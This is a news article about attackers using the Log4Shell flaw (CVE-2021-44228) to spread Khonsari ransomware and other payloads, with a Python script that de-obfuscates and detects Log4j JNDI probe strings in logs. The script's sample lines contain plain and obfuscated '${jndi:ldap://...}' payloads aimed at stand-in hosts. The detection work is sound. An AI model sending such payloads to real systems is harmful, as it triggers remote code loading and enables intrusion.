Hackers Exploiting Log4j Vulnerability to Infect Computers with Khonsari Ransomware

Romanian cybersecurity technology company Bitdefender said on Monday that attempts are being made to infect Windows machines with a new ransomware family called Khonsari, as well as with the Orcus remote access Trojan, by exploiting the recently disclosed critical Log4j vulnerability.

The attack exploits the remote code execution flaw to download an additional payload, a .NET binary, from a remote server. The binary encrypts the victim's files, giving them the .khonsari extension, and displays a ransom note that instructs the victim to pay in Bitcoin in exchange for regaining access to the files.


The vulnerability is tracked as CVE-2021-44228 and is also known as Log4Shell or LogJam. Put simply, the bug lets an unauthenticated attacker force an affected system to download and run malware, giving the attacker a digital foothold on servers inside corporate networks.

Log4j is an open-source Java logging library maintained by the non-profit Apache Software Foundation. With over 475,000 downloads of its GitHub project, the library is widely used for logging application events and is also bundled into other frameworks such as Elasticsearch, Kafka and Flink, which are in turn used by many websites, Internet-facing services and popular applications.

The disclosure comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) raised the alarm over active and widespread exploitation of the flaw, which, if left unpatched, could grant attackers unfettered access and set off a new round of cyberattacks while companies rush to find and fix vulnerable machines.

“An attacker could exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing that system to execute arbitrary code,” said guidance released by the agency on Monday. “The request allows an attacker to take full control of the system. An attacker could then steal information, launch ransomware, or perform other malicious actions.”

In addition, CISA has added the Log4j flaw to its catalog of Known Exploited Vulnerabilities, giving federal agencies until December 24 to patch it. Similar guidance has already been issued by government agencies in Austria, Canada, New Zealand and the United Kingdom.

Active exploitation attempts recorded in the wild so far include abuse of the flaw to enlist devices into botnets and to drop additional payloads such as Cobalt Strike and cryptocurrency miners. Cybersecurity firm Sophos said it has also observed attempts to steal Amazon Web Services keys and other private data from compromised hosts.

As a sign of how quickly the threat is evolving, Check Point researchers warned that more than 60 new variants of the original Log4j exploit appeared in less than 24 hours, adding that the company had blocked more than 845,000 intrusion attempts, with 46% of the attacks carried out by known malicious groups.
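Most of those "variants" are not new bugs but obfuscations of the same `${jndi:...}` lookup string, built from Log4j's own lookup grammar (`${lower:j}`, `${env:X:-j}`, `${::-j}`) so that a naive search for the literal text `jndi:` misses them. The following detector, written for this article as an added example and not code from Bitdefender, Check Point, CISA or the Log4j project, resolves nested lookups the way Log4j 2's string substitution does, as far as matters for detection, and then looks for a JNDI lookup in the de-obfuscated result. The log lines are constructed samples using RFC 5737 documentation addresses; the assumption that unresolvable lookups such as `env:` and `sys:` fall back to their `:-` default is a simplification (on a real host they would resolve against the environment), and the list of JNDI schemes is a reasonable default, not an exhaustive one.

```python
import re
from typing import List, Tuple

# Constructed sample log lines (not real telemetry): one benign request and
# four shapes of Log4Shell probe, three of them obfuscated with nested lookups.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.8 - - "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.11/x} HTTP/1.1" 400 "-"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${env:NOTHING:-j}ndi:rmi://203.0.113.12/y}"',
    '10.0.0.10 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.13/z}"',
]

# An innermost ${...}: no nested '$', '{' or '}' inside the braces.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# JNDI lookup with one of the schemes commonly abused for CVE-2021-44228.
JNDI = re.compile(r"jndi:(ldap|ldaps|rmi|dns|iiop|corba|nis|nds|http)", re.IGNORECASE)

# Lookup prefixes we cannot evaluate offline; attackers rely on their ':-'
# default value to assemble the string, so we take the default (assumption).
UNRESOLVABLE = {"", "env", "sys", "date", "ctx", "main", "bundle", "java", "marker", "event"}


def _resolve_lookup(body: str) -> str:
    """Evaluate the body of one innermost ${...} as Log4j 2's substitutor would,
    to the extent needed for detection. Always returns text without braces,
    so repeated application terminates."""
    if ":-" in body:
        prefix, default = body.split(":-", 1)
        key = prefix.split(":", 1)[0].lower()      # "" for "${::-x}"
        if key in UNRESOLVABLE:
            return default
    prefix, _, rest = body.partition(":")
    kind = prefix.lower()                          # Log4j lowercases the prefix
    if kind == "lower":
        return rest.lower()
    if kind == "upper":
        return rest.upper()
    if kind == "jndi":
        return "jndi:" + rest                      # keep as a marker for JNDI below
    return body                                    # unknown lookup: drop braces, keep text


def normalize_lookups(text: str, max_rounds: int = 50) -> str:
    """Repeatedly resolve innermost lookups until the text stops changing."""
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(lambda m: _resolve_lookup(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup once obfuscation is peeled away."""
    return JNDI.search(normalize_lookups(line)) is not None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (index, de-obfuscated line) for every line that looks like a probe."""
    return [(i, normalize_lookups(line)) for i, line in enumerate(lines) if is_log4shell_probe(line)]


if __name__ == "__main__":
    for index, shown in scan(SAMPLE_LOG_LINES):
        print(f"line {index}: {shown}")
```

Running the block flags lines 1 to 4 and prints each with its lookup chain collapsed to a plain `jndi:<scheme>://...`, which is also the form worth writing to a SIEM so analysts are not left reading `${::-j}${::-n}`. Because the normalizer only ever removes braces, it cannot loop forever on adversarial input, and the round cap guards against pathological nesting depth.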

According to Kaspersky telemetry, the largest share of Log4Shell exploitation attempts originated from Russia (4,275), followed by Brazil (2,493), the U.S. (1,746), Germany (1,336), Mexico (1,177), Italy (1,094), France (1,008) and Iran (976). By comparison, only 351 attempts were observed from China.

Beyond the rapidly mutating nature of the exploit, Log4j's widespread adoption across industries has also put industrial control systems and the operational technology environments that run critical infrastructure on high alert.

“Log4j is widely used in external / internet-facing and internal applications that control and monitor manufacturing processes, leaving many industrial operations, such as electricity, water, food and beverage, manufacturing and others, exposed to potential remote exploitation and access,” said Sergio Caltagirone, vice president of Threat Intelligence at Dragos. “It is important to prioritize external and Internet-facing applications over internal applications because of their exposure to the Internet, although both are vulnerable.”

The development further highlights how critical security flaws in open-source software can pose a significant threat to organizations that include such common dependencies in their IT systems. Beyond its broad reach, Log4Shell is even more worrisome because of its relative ease of exploitation, which lays the groundwork for future ransomware attacks.

“To be clear, this vulnerability poses a severe risk,” said CISA Director Jen Easterly. “This vulnerability, which is being widely exploited by a growing set of attackers, presents an urgent challenge to network defenders given its broad use. Vendors should also be communicating with their customers to ensure end users know that their product contains this vulnerability and should prioritize software updates.”

The post Hackers Exploiting Log4j Vulnerability to Infect Computers with Khonsari Ransomware appeared first on OFFICIAL HACKER.